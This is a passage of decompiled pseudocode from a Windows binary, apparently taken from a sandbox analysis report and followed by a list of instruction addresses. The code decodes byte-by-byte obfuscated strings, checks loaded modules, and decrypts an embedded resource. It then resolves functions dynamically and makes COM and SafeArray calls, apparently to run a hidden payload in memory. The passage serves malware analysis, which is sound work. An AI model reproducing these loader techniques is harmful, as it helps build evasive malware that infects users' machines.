				 *((char*)(_t556 + 0x1b)) = 0x2a;
				 *((char*)(_t556 + 0x1c)) = 0xa2;
				 *((char*)(_t556 + 0x1d)) = 0x2a;
				 *((char*)(_t556 + 0x1e)) = 0x2a;
				 *((char*)(_t556 + 0x1f)) = 0x41;
				 *((char*)(_t556 + 0x20)) = 0xd3;
				 *((char*)(_t556 + 0x21)) = 0x20;
				 *((char*)(_t556 + 0x22)) = 0x64;
				 *((char*)(_t556 + 0x23)) = 6;
				 *((char*)(_t556 + 0x24)) = 0x8a;
				 *((char*)(_t556 + 0x25)) = 0xf7;
				 *((char*)(_t556 + 0x26)) = 0x3d;
				 *((char*)(_t556 + 0x27)) = 0x9d;
				 *((char*)(_t556 + 0x28)) = 0xd9;
				 *((char*)(_t556 + 0x29)) = 0xee;
				 *((char*)(_t556 + 0x2a)) = 0x15;
				 *((char*)(_t556 + 0x2b)) = 0x68;
				 *((char*)(_t556 + 0x2c)) = 0xf4;
				 *((char*)(_t556 + 0x2d)) = 0x76;
				 *((char*)(_t556 + 0x2e)) = 0xb9;
				 *((char*)(_t556 + 0x2f)) = 0x34;
				 *((char*)(_t556 + 0x30)) = 0xbf;
				 *((char*)(_t556 + 0x31)) = 0x1e;
				 *((char*)(_t556 + 0x32)) = 0xe7;
				 *((char*)(_t556 + 0x33)) = 0x78;
				 *((char*)(_t556 + 0x34)) = 0x98;
				 *((char*)(_t556 + 0x35)) = 0xe9;
				 *((char*)(_t556 + 0x36)) = 0x6f;
				 *((char*)(_t556 + 0x37)) = 0xb4;
				 *((char*)(_t556 + 0x38)) = 0;
				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
				_t557 = _t556 + 0xc;
				if(_t337 == 0x41b2a0) {
					L80:
					__eflags = 0;
					return 0;
				} else {
					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
					_t525 = _t340;
					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
					 *((char*)(_t557 + 0x64)) = 0xce;
					 *((char*)(_t557 + 0x65)) = 0x27;
					 *((char*)(_t557 + 0x66)) = 0x9c;
					 *((char*)(_t557 + 0x67)) = 0x1a;
					 *((char*)(_t557 + 0x68)) = 0x95;
					 *((char*)(_t557 + 0x69)) = 0x2e;
					 *((char*)(_t557 + 0x6a)) = 0x22;
					 *((char*)(_t557 + 0x6b)) = 0x57;
					 *((char*)(_t557 + 0x6c)) = 0x91;
					 *((char*)(_t557 + 0x6d)) = 0x21;
					 *((char*)(_t557 + 0x6e)) = 0x57;
					 *((char*)(_t557 + 0x6f)) = 0x3a;
					 *((char*)(_t557 + 0x70)) = 0xf8;
					 *((char*)(_t557 + 0x71)) = 0x98;
					 *((char*)(_t557 + 0x72)) = 0x5b;
					 *((char*)(_t557 + 0x73)) = 0xf4;
					 *((char*)(_t557 + 0x74)) = 0xb5;
					 *((char*)(_t557 + 0x75)) = 0x87;
					 *((char*)(_t557 + 0x76)) = 0x7b;
					 *((char*)(_t557 + 0x77)) = 0xf;
					 *((char*)(_t557 + 0x78)) = 0xf4;
					 *((char*)(_t557 + 0x79)) = 0x76;
					 *((char*)(_t557 + 0x7a)) = 0xb9;
					 *((char*)(_t557 + 0x7b)) = 0x34;
					 *((char*)(_t557 + 0x7c)) = 0xbf;
					 *((char*)(_t557 + 0x7d)) = 0x1e;
					 *((char*)(_t557 + 0x7e)) = 0xe7;
					 *((char*)(_t557 + 0x7f)) = 0x78;
					 *((char*)(_t557 + 0x80)) = 0x98;
					 *((char*)(_t557 + 0x81)) = 0xe9;
					 *((char*)(_t557 + 0x82)) = 0x6f;
					 *((char*)(_t557 + 0x83)) = 0xb4;
					 *((char*)(_t557 + 0x84)) = 0;
					 *((char*)(_t557 + 0x18)) = 0xc0;
					 *((char*)(_t557 + 0x19)) = 0x38;
					 *((char*)(_t557 + 0x1a)) = 0x8d;
					 *((char*)(_t557 + 0x1b)) = 0x1f;
					 *((char*)(_t557 + 0x1c)) = 0x8e;
					 *((char*)(_t557 + 0x1d)) = 0x30;
					 *((char*)(_t557 + 0x1e)) = 0x65;
					 *((char*)(_t557 + 0x1f)) = 0x47;
					 *((char*)(_t557 + 0x20)) = 0xd3;
					 *((char*)(_t557 + 0x21)) = 0x29;
					 *((char*)(_t557 + 0x22)) = 0x3b;
					 *((char*)(_t557 + 0x23)) = 0x56;
					 *((char*)(_t557 + 0x24)) = 0xf8;
					 *((char*)(_t557 + 0x25)) = 0x98;
					 *((char*)(_t557 + 0x26)) = 0x5b;
					 *((char*)(_t557 + 0x27)) = 0xf4;
					 *((char*)(_t557 + 0x28)) = 0xb5;
					 *((char*)(_t557 + 0x29)) = 0x87;
					 *((char*)(_t557 + 0x2a)) = 0x7b;
					 *((char*)(_t557 + 0x2b)) = 0xf;
					 *((char*)(_t557 + 0x2c)) = 0xf4;
					 *((char*)(_t557 + 0x2d)) = 0x76;
					 *((char*)(_t557 + 0x2e)) = 0xb9;
					 *((char*)(_t557 + 0x2f)) = 0x34;
					 *((char*)(_t557 + 0x30)) = 0xbf;
					 *((char*)(_t557 + 0x31)) = 0x1e;
					 *((char*)(_t557 + 0x32)) = 0xe7;
					 *((char*)(_t557 + 0x33)) = 0x78;
					 *((char*)(_t557 + 0x34)) = 0x98;
					 *((char*)(_t557 + 0x35)) = 0xe9;
					 *((char*)(_t557 + 0x36)) = 0x6f;
					 *((char*)(_t557 + 0x37)) = 0xb4;
					 *((char*)(_t557 + 0x38)) = 0;
					_t341 = Module32First(_t525, _t557 + 0x278); // executed
					if(_t341 == 0) {
						L38:
						FindCloseChangeNotification(_t525); // executed
						_t526 = GetModuleHandleA(0);
						 *((char*)(_t557 + 0x1c)) = 0xfc;
						 *((char*)(_t557 + 0x1d)) = 0xb;
						 *((char*)(_t557 + 0x1e)) = 0xff;
						 *((char*)(_t557 + 0x1f)) = 0x75;
						 *((char*)(_t557 + 0x20)) = 0xe7;
						 *((char*)(_t557 + 0x21)) = 0x44;
						 *((char*)(_t557 + 0x22)) = 0x4b;
						 *((char*)(_t557 + 0x23)) = 0x23;
						 *((char*)(_t557 + 0x24)) = 0xbf;
						 *((char*)(_t557 + 0x25)) = 0x45;
						 *((char*)(_t557 + 0x26)) = 0x3b;
						 *((char*)(_t557 + 0x27)) = 0x56;
						 *((char*)(_t557 + 0x28)) = 0xf8;
						 *((char*)(_t557 + 0x29)) = 0x98;
						 *((char*)(_t557 + 0x2a)) = 0x5b;
						 *((char*)(_t557 + 0x2b)) = 0xf4;
						 *((char*)(_t557 + 0x2c)) = 0xb5;
						 *((char*)(_t557 + 0x2d)) = 0x87;
						 *((char*)(_t557 + 0x2e)) = 0x7b;
						 *((char*)(_t557 + 0x2f)) = 0xf;
						 *((char*)(_t557 + 0x30)) = 0xf4;
						 *((char*)(_t557 + 0x31)) = 0x76;
						 *((char*)(_t557 + 0x32)) = 0xb9;
						 *((char*)(_t557 + 0x33)) = 0x34;
						 *((char*)(_t557 + 0x34)) = 0xbf;
						 *((char*)(_t557 + 0x35)) = 0x1e;
						 *((char*)(_t557 + 0x36)) = 0xe7;
						 *((char*)(_t557 + 0x37)) = 0x78;
						 *((char*)(_t557 + 0x38)) = 0x98;
						 *((char*)(_t557 + 0x39)) = 0xe9;
						 *((char*)(_t557 + 0x3a)) = 0x6f;
						 *((char*)(_t557 + 0x3b)) = 0xb4;
						 *((char*)(_t557 + 0x3c)) = 0;
						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
						_t558 = _t557 + 8;
						_t536 = FindResourceA(_t526, _t344, 0xa);
						 *(_t558 + 0x50) = _t536;
						_t551 = LoadResource(_t526, _t536);
						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
						_push(0x40022);
						_t537 = _t349; // executed
						_t350 = E0040AF66(0, _t526, __eflags); // executed
						_t559 = _t558 + 8;
						 *(_t559 + 0x34) = _t350;
						__eflags = _t350;
						if(_t350 == 0) {
							 *(_t559 + 0x50) = 0;
						} else {
							E0040BA30(_t526, _t350, 0, 0x40022);
							_t486 =  *(_t559 + 0x40);
							_t559 = _t559 + 0xc;
							 *(_t559 + 0x50) = _t486;
						}
						E00401300( *(_t559 + 0x50));
						_t497 =  *(_t559 + 0x48);
						_t352 = SizeofResource(_t526, _t497);
						 *(_t559 + 0x40) = _t352;
						asm("cdq");
						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
						__eflags = _t354;
						if(_t354 > 0) {
							_t519 =  *(_t559 + 0x3c);
							_t482 = _t537 - _t519;
							__eflags = _t482;
							 *(_t559 + 0x34) = _t519;
							 *(_t559 + 0x88) = _t482;
							 *(_t559 + 0x38) = _t354;
							do {
								_t424 =  *(_t559 + 0x34);
								_push( *(_t559 + 0x88) + _t424);
								_push(0x400);
								_push(_t424);
								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
								_t179 = _t559 + 0x38;
								 *_t179 =  *(_t559 + 0x38) - 1;
								__eflags =  *_t179;
							} while ( *_t179 != 0);
						}
						_t448 =  *(_t559 + 0x40) & 0x800003ff;
						__eflags = _t448;
						if(_t448 < 0) {
							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
							__eflags = _t448;
						}
						__eflags = _t448;
						if(_t448 > 0) {
							_t421 =  *(_t559 + 0x40) - _t448;
							_push(_t421 + _t537);
							_push(_t448);
							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
							__eflags = _t422;
							_push(_t422);
							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
						}
						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
						_t560 = _t559 + 0xc;
						FreeResource(_t551);
						_t552 =  *_t537;
						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
						_t561 = _t560 + 4;
						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
						_t527 =  *((intOrPtr*)(_t561 + 0x38));
						_t192 = _t537 + 4; // 0x4
						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
						_t528 = _t527 + 0xe;
						 *((char*)(_t561 + 0x34)) = 0xce;
						 *((char*)(_t561 + 0x35)) = 0x27;
						 *((char*)(_t561 + 0x36)) = 0x9c;
						 *((char*)(_t561 + 0x37)) = 0x1a;
						 *((char*)(_t561 + 0x38)) = 0x95;
						 *((char*)(_t561 + 0x39)) = 0x21;
						 *((char*)(_t561 + 0x3a)) = 0x2e;
						 *((char*)(_t561 + 0x3b)) = 0xd;
						 *((char*)(_t561 + 0x3c)) = 0xdb;
						 *((char*)(_t561 + 0x3d)) = 0x29;
						 *((char*)(_t561 + 0x3e)) = 0x57;
						 *((char*)(_t561 + 0x3f)) = 0x56;
						 *((char*)(_t561 + 0x40)) = 0xf8;
						 *((char*)(_t561 + 0x41)) = 0x98;
						 *((char*)(_t561 + 0x42)) = 0x5b;
						 *((char*)(_t561 + 0x43)) = 0xf4;
						 *((char*)(_t561 + 0x44)) = 0xb5;
						 *((char*)(_t561 + 0x45)) = 0x87;
						 *((char*)(_t561 + 0x46)) = 0x7b;
						 *((char*)(_t561 + 0x47)) = 0xf;
						 *((char*)(_t561 + 0x48)) = 0xf4;
						 *((char*)(_t561 + 0x49)) = 0x76;
						 *((char*)(_t561 + 0x4a)) = 0xb9;
						 *((char*)(_t561 + 0x4b)) = 0x34;
						 *((char*)(_t561 + 0x4c)) = 0xbf;
						 *((char*)(_t561 + 0x4d)) = 0x1e;
						 *((char*)(_t561 + 0x4e)) = 0xe7;
						 *((char*)(_t561 + 0x4f)) = 0x78;
						 *((char*)(_t561 + 0x50)) = 0x98;
						 *((char*)(_t561 + 0x51)) = 0xe9;
						 *((char*)(_t561 + 0x52)) = 0x6f;
						 *((char*)(_t561 + 0x53)) = 0xb4;
						 *((char*)(_t561 + 0x54)) = 0;
						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
						_t562 = _t561 + 0x24;
						_t365 = LoadLibraryA(_t364); // executed
						_t538 = _t365;
						 *((char*)(_t562 + 0x10)) = 0xe0;
						 *((char*)(_t562 + 0x11)) = 0x18;
						 *((char*)(_t562 + 0x12)) = 0xad;
						 *((char*)(_t562 + 0x13)) = 0x36;
						 *((char*)(_t562 + 0x14)) = 0x95;
						 *((char*)(_t562 + 0x15)) = 0x21;
						_t451 = _t562 + 0x134;
						 *((char*)(_t562 + 0x1e)) = 0x2a;
						 *((char*)(_t562 + 0x1f)) = 0x57;
						 *((char*)(_t562 + 0x20)) = 0xda;
						 *((char*)(_t562 + 0x21)) = 0xc;
						 *((char*)(_t562 + 0x22)) = 0x55;
						 *((char*)(_t562 + 0x23)) = 0x25;
						 *((char*)(_t562 + 0x24)) = 0x8c;
						 *((char*)(_t562 + 0x25)) = 0xf9;
						 *((char*)(_t562 + 0x26)) = 0x35;
						 *((char*)(_t562 + 0x27)) = 0x97;
						 *((char*)(_t562 + 0x28)) = 0xd0;
						 *((char*)(_t562 + 0x29)) = 0x87;
						 *((char*)(_t562 + 0x2a)) = 0x7b;
						 *((char*)(_t562 + 0x2b)) = 0xf;
						 *((char*)(_t562 + 0x2c)) = 0xf4;
						 *((char*)(_t562 + 0x2d)) = 0x76;
						 *((char*)(_t562 + 0x2e)) = 0xb9;
						 *((char*)(_t562 + 0x2f)) = 0x34;
						 *((char*)(_t562 + 0x30)) = 0xbf;
						 *((char*)(_t562 + 0x31)) = 0x1e;
						 *((char*)(_t562 + 0x32)) = 0xe7;
						 *((char*)(_t562 + 0x33)) = 0x78;
						 *((char*)(_t562 + 0x34)) = 0x98;
						 *((char*)(_t562 + 0x35)) = 0xe9;
						 *((char*)(_t562 + 0x36)) = 0x6f;
						 *((char*)(_t562 + 0x37)) = 0xb4;
						 *((char*)(_t562 + 0x38)) = 0;
						_t366 = E00401650(_t562 + 0x14, _t451);
						_t563 = _t562 + 8;
						_t367 = GetProcAddress(_t365, _t366);
						__eflags = _t367;
						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
						__eflags = _t452;
						 *(_t563 + 0x47) = _t452 == 0;
						 *0x423480 = _t367;
						 *((intOrPtr*)(_t563 + 0x80)) = 0;
						 *((intOrPtr*)(_t563 + 0x84)) = 0;
						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
						 *(_t563 + 0x58) = 0;
						 *(_t563 + 0x54) = 0;
						__eflags = _t452;
						if(_t452 != 0) {
							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
							__eflags = _t368;
							if(_t368 >= 0) {
								__eflags =  *(_t563 + 0x47);
								if( *(_t563 + 0x47) == 0) {
									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
									_t376 =  *((intOrPtr*)(_t563 + 0x80));
									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
									__eflags = _t378;
									if(_t378 >= 0) {
										_t381 =  *((intOrPtr*)(_t563 + 0x84));
										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
										__eflags = _t383;
										if(_t383 >= 0) {
											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
											__eflags = _t385;
											if(_t385 >= 0) {
												 *((intOrPtr*)(_t563 + 0x38)) = 0;
												E00401870(_t563 + 0x44, _t552, "_._");
												_t539 = __imp__#8;
												 *((intOrPtr*)(_t563 + 0x40)) = 0;
												 *_t539(_t563 + 0x94);
												E00401870(_t563 + 0x3c, _t552, "___");
												 *_t539(_t563 + 0xa4);
												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
												_t542 =  *(_t563 + 0x58);
												__eflags = _t542;
												if(_t542 == 0) {
													E0040AD90(0x80004003);
												}
												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
												 *((intOrPtr*)(_t563 + 0x98)) = 0;
												__imp__#15(0x11, 1, _t563 + 0x88); // executed
												_t543 = _t396;
												 *((intOrPtr*)(_t563 + 0x50)) = 0;
												__imp__#23(_t543, _t563 + 0x48);
												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
												_t564 = _t563 + 0xc;
												__imp__#24(_t543);
												_t399 =  *(_t564 + 0x54);
												__eflags = _t399;
												if(_t399 == 0) {
													_t399 = E0040AD90(0x80004003);
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
												__eflags = _t543;
												if(_t543 != 0) {
													__imp__#16(_t543); // executed
												}
												_t402 =  *(_t564 + 0x34);
												__eflags = _t402;
												if(_t402 == 0) {
													_t402 = E0040AD90(0x80004003);
												}
												_t469 =  *(_t564 + 0x40);
												_t555 = _t402;
												__eflags = _t469;
												if(_t469 == 0) {
													_t531 = 0;
													__eflags = 0;
												} else {
													_t531 =  *_t469;
												}
												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
												__imp__#411(0xc, 0, 0);
												_t471 =  *(_t564 + 0x3c);
												__eflags = _t471;
												if(_t471 == 0) {
													E0040AD90(0x80004003);
												}
												_t405 =  *(_t564 + 0x38);
												__eflags = _t405;
												if(_t405 == 0) {
													_t514 = 0;
													__eflags = 0;
												} else {
													_t514 =  *_t405;
												}
												_t563 = _t564 - 0x10;
												_t407 = _t563;
												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
												_t538 = __imp__#9; // 0x75f4cf00
												_t538->i(_t563 + 0xa4);
												E004019A0(_t563 + 0x38);
												_t538->i(_t563 + 0x94);
												_t413 =  *(_t563 + 0x3c);
												__eflags = _t413;
												if(_t413 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
												}
												E004019A0(_t563 + 0x40);
												_t415 =  *(_t563 + 0x34);
												__eflags = _t415;
												if(_t415 != 0) {
													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
												}
											}
										}
									}
									_t379 =  *((intOrPtr*)(_t563 + 0x174));
									__eflags = _t379 - _t563 + 0x178;
									if(__eflags != 0) {
										_push(_t379);
										E0040B6B5(0, _t528, _t538, __eflags);
										_t563 = _t563 + 4;
									}
								}
							}
							_t369 =  *(_t563 + 0x54);
							__eflags = _t369;
							if(_t369 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
							}
							_t370 =  *(_t563 + 0x58);
							__eflags = _t370;
							if(_t370 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
							}
						}
						goto L80;
					} else {
						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
						_t565 = _t557 + 8;
						_t547 = _t428;
						_t520 = _t565 + 0x298;
						while(1) {
							_t429 =  *_t520;
							if(_t429 !=  *_t547) {
								break;
							}
							if(_t429 == 0) {
								L7:
								_t429 = 0;
							} else {
								_t493 =  *((intOrPtr*)(_t520 + 1));
								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
									break;
								} else {
									_t520 = _t520 + 2;
									_t547 = _t547 + 2;
									if(_t493 != 0) {
										continue;
									} else {
										goto L7;
									}
								}
							}
							L9:
							if(_t429 != 0) {
								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
								_t557 = _t565 + 8;
								_t548 = _t431;
								_t488 = _t557 + 0x298;
								while(1) {
									_t432 =  *_t488;
									__eflags = _t432 -  *_t548;
									if(_t432 !=  *_t548) {
										break;
									}
									__eflags = _t432;
									if(_t432 == 0) {
										L16:
										_t432 = 0;
									} else {
										_t432 =  *((intOrPtr*)(_t488 + 1));
										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
											break;
										} else {
											_t488 = _t488 + 2;
											_t548 = _t548 + 2;
											__eflags = _t432;
											if(_t432 != 0) {
												continue;
											} else {
												goto L16;
											}
										}
									}
									L18:
									__eflags = _t432;
									if(_t432 == 0) {
										goto L10;
									} else {
										_t435 = Module32Next(_t525, _t557 + 0x278);
										__eflags = _t435;
										if(_t435 != 0) {
											do {
												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
												_t566 = _t557 + 8;
												_t549 = _t437;
												_t490 = _t566 + 0x298;
												while(1) {
													_t438 =  *_t490;
													__eflags = _t438 -  *_t549;
													if(_t438 !=  *_t549) {
														break;
													}
													__eflags = _t438;
													if(_t438 == 0) {
														L26:
														_t438 = 0;
													} else {
														_t438 =  *((intOrPtr*)(_t490 + 1));
														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
															break;
														} else {
															_t490 = _t490 + 2;
															_t549 = _t549 + 2;
															__eflags = _t438;
															if(_t438 != 0) {
																continue;
															} else {
																goto L26;
															}
														}
													}
													L28:
													__eflags = _t438;
													if(_t438 == 0) {
														goto L10;
													} else {
														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
														_t557 = _t566 + 8;
														_t550 = _t439;
														_t492 = _t557 + 0x298;
														while(1) {
															_t440 =  *_t492;
															__eflags = _t440 -  *_t550;
															if(_t440 !=  *_t550) {
																break;
															}
															__eflags = _t440;
															if(_t440 == 0) {
																L34:
																_t440 = 0;
															} else {
																_t440 =  *((intOrPtr*)(_t492 + 1));
																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
																	break;
																} else {
																	_t492 = _t492 + 2;
																	_t550 = _t550 + 2;
																	__eflags = _t440;
																	if(_t440 != 0) {
																		continue;
																	} else {
																		goto L34;
																	}
																}
															}
															L36:
															__eflags = _t440;
															if(_t440 == 0) {
																goto L10;
															} else {
																goto L37;
															}
															goto L81;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L36;
													}
													goto L81;
												}
												asm("sbb eax, eax");
												asm("sbb eax, 0xffffffff");
												goto L28;
												L37:
												_t442 = Module32Next(_t525, _t557 + 0x278);
												__eflags = _t442;
											} while (_t442 != 0);
										}
										goto L38;
									}
									goto L81;
								}
								asm("sbb eax, eax");
								asm("sbb eax, 0xffffffff");
								goto L18;
							} else {
								L10:
								CloseHandle(_t525);
								return 0;
							}
							goto L81;
						}
						asm("sbb eax, eax");
						asm("sbb eax, 0xffffffff");
						goto L9;
					}
				}
				L81:
			}

0x004019f0
0x004019f0
0x004019fd
0x00401a10
0x00401a15
0x00401a1a
0x00401a1f
0x00401a24
0x00401a29
0x00401a2e
0x00401a33
0x00401a38
0x00401a3d
0x00401a42
0x00401a47
0x00401a4c
0x00401a51
0x00401a56
0x00401a5b
0x00401a60
0x00401a65
0x00401a6a
0x00401a6f
0x00401a74
0x00401a79
0x00401a7e
0x00401a83
0x00401a88
0x00401a8d
0x00401a92
0x00401a97
0x00401a9c
0x00401aa1
0x00401aa6
0x00401aab
0x00401ab0
0x00401ab9
0x00401aba
0x00401abf
0x00401ac7
0x0040248d
0x0040248d
0x00402496
0x00401acd
0x00401ad6
0x00401ae2
0x00401ae6
0x00401af1
0x00401af6
0x00401afb
0x00401b00
0x00401b05
0x00401b0a
0x00401b0f
0x00401b14
0x00401b19
0x00401b1e
0x00401b23
0x00401b28
0x00401b2d
0x00401b32
0x00401b37
0x00401b3c
0x00401b41
0x00401b46
0x00401b4b
0x00401b50
0x00401b55
0x00401b5a
0x00401b5f
0x00401b64
0x00401b69
0x00401b6e
0x00401b73
0x00401b78
0x00401b7d
0x00401b85
0x00401b8d
0x00401b95
0x00401b9d
0x00401ba4
0x00401ba9
0x00401bae
0x00401bb3
0x00401bb8
0x00401bbd
0x00401bc2
0x00401bc7
0x00401bcc
0x00401bd1
0x00401bd6
0x00401bdb
0x00401be0
0x00401be5
0x00401bea
0x00401bef
0x00401bf4
0x00401bf9
0x00401bfe
0x00401c03
0x00401c08
0x00401c0d
0x00401c12
0x00401c17
0x00401c1c
0x00401c21
0x00401c26
0x00401c2b
0x00401c30
0x00401c35
0x00401c3a
0x00401c3f
0x00401c44
0x00401c48
0x00401c4f
0x00401dc3
0x00401dc4
0x00401de0
0x00401de2
0x00401de7
0x00401dec
0x00401df1
0x00401df6
0x00401dfb
0x00401e00
0x00401e05
0x00401e0a
0x00401e0f
0x00401e14
0x00401e19
0x00401e1e
0x00401e23
0x00401e28
0x00401e2d
0x00401e32
0x00401e37
0x00401e3c
0x00401e41
0x00401e46
0x00401e4b
0x00401e50
0x00401e55
0x00401e5a
0x00401e5f
0x00401e64
0x00401e69
0x00401e6e
0x00401e73
0x00401e78
0x00401e7d
0x00401e82
0x00401e86
0x00401e8b
0x00401e96
0x00401e9a
0x00401ea4
0x00401eaf
0x00401eba
0x00401ebf
0x00401ec4
0x00401ec6
0x00401ecb
0x00401ece
0x00401ed2
0x00401ed4
0x00401eef
0x00401ed6
0x00401edd
0x00401ee2
0x00401ee6
0x00401ee9
0x00401ee9
0x00401ef7
0x00401efc
0x00401f02
0x00401f08
0x00401f0c
0x00401f15
0x00401f18
0x00401f1a
0x00401f1c
0x00401f22
0x00401f22
0x00401f24
0x00401f28
0x00401f2f
0x00401f33
0x00401f33
0x00401f40
0x00401f45
0x00401f4a
0x00401f4b
0x00401f50
0x00401f58
0x00401f58
0x00401f58
0x00401f58
0x00401f33
0x00401f63
0x00401f63
0x00401f69
0x00401f72
0x00401f72
0x00401f72
0x00401f73
0x00401f75
0x00401f7b
0x00401f80
0x00401f81
0x00401f86
0x00401f86
0x00401f8c
0x00401f8d
0x00401f8d
0x00401f9d
0x00401fa2
0x00401fa6
0x00401fac
0x00401faf
0x00401fb6
0x00401fbf
0x00401fc4
0x00401fc8
0x00401fce
0x00401fd3
0x00401fe0
0x00401fec
0x00401ffe
0x00402001
0x00402006
0x0040200b
0x00402010
0x00402015
0x0040201a
0x0040201f
0x00402024
0x00402029
0x0040202e
0x00402033
0x00402038
0x0040203d
0x00402042
0x00402047
0x0040204c
0x00402051
0x00402056
0x0040205b
0x00402060
0x00402065
0x0040206a
0x0040206f
0x00402074
0x00402079
0x0040207e
0x00402083
0x00402088
0x0040208d
0x00402092
0x00402097
0x0040209c
0x004020a1
0x004020a5
0x004020aa
0x004020ae
0x004020b4
0x004020b6
0x004020bb
0x004020c0
0x004020c5
0x004020ca
0x004020cf
0x004020d4
0x004020e1
0x004020e6
0x004020eb
0x004020f0
0x004020f5
0x004020fa
0x004020ff
0x00402104
0x00402109
0x0040210e
0x00402113
0x00402118
0x0040211d
0x00402122
0x00402127
0x0040212c
0x00402131
0x00402136
0x0040213b
0x00402140
0x00402145
0x0040214a
0x0040214f
0x00402154
0x00402159
0x0040215e
0x00402163
0x00402167
0x0040216c
0x00402171
0x00402177
0x00402179
0x0040217c
0x0040217e
0x00402183
0x00402188
0x0040218f
0x00402196
0x0040219a
0x0040219e
0x004021a2
0x004021a4
0x004021bc
0x004021be
0x004021c0
0x004021c6
0x004021ca
0x004021e5
0x004021ec
0x004021f1
0x00402213
0x00402215
0x00402217
0x0040221d
0x00402239
0x0040223b
0x0040223d
0x00402243
0x0040224d
0x0040224f
0x00402251
0x00402260
0x00402264
0x00402269
0x00402277
0x0040227b
0x00402286
0x00402293
0x004022af
0x004022b1
0x004022b5
0x004022b7
0x004022be
0x004022be
0x004022d7
0x004022e8
0x004022ef
0x004022f6
0x00402300
0x00402304
0x00402308
0x00402315
0x0040231a
0x0040231e
0x00402324
0x00402328
0x0040232a
0x00402331
0x00402331
0x0040234e
0x00402350
0x00402352
0x00402355
0x00402355
0x0040235b
0x0040235f
0x00402361
0x00402368
0x00402368
0x0040236d
0x00402371
0x00402373
0x00402375
0x0040237b
0x0040237b
0x00402377
0x00402377
0x00402377
0x00402390
0x00402396
0x0040239c
0x004023a0
0x004023a2
0x004023a9
0x004023a9
0x004023ae
0x004023b2
0x004023b4
0x004023ba
0x004023ba
0x004023b6
0x004023b6
0x004023b6
0x004023ce
0x004023d1
0x004023d3
0x004023dd
0x004023ec
0x004023ef
0x004023fe
0x00402401
0x00402403
0x00402411
0x00402417
0x00402424
0x00402426
0x0040242a
0x0040242c
0x00402434
0x00402434
0x0040243a
0x0040243f
0x00402443
0x00402445
0x0040244d
0x0040244d
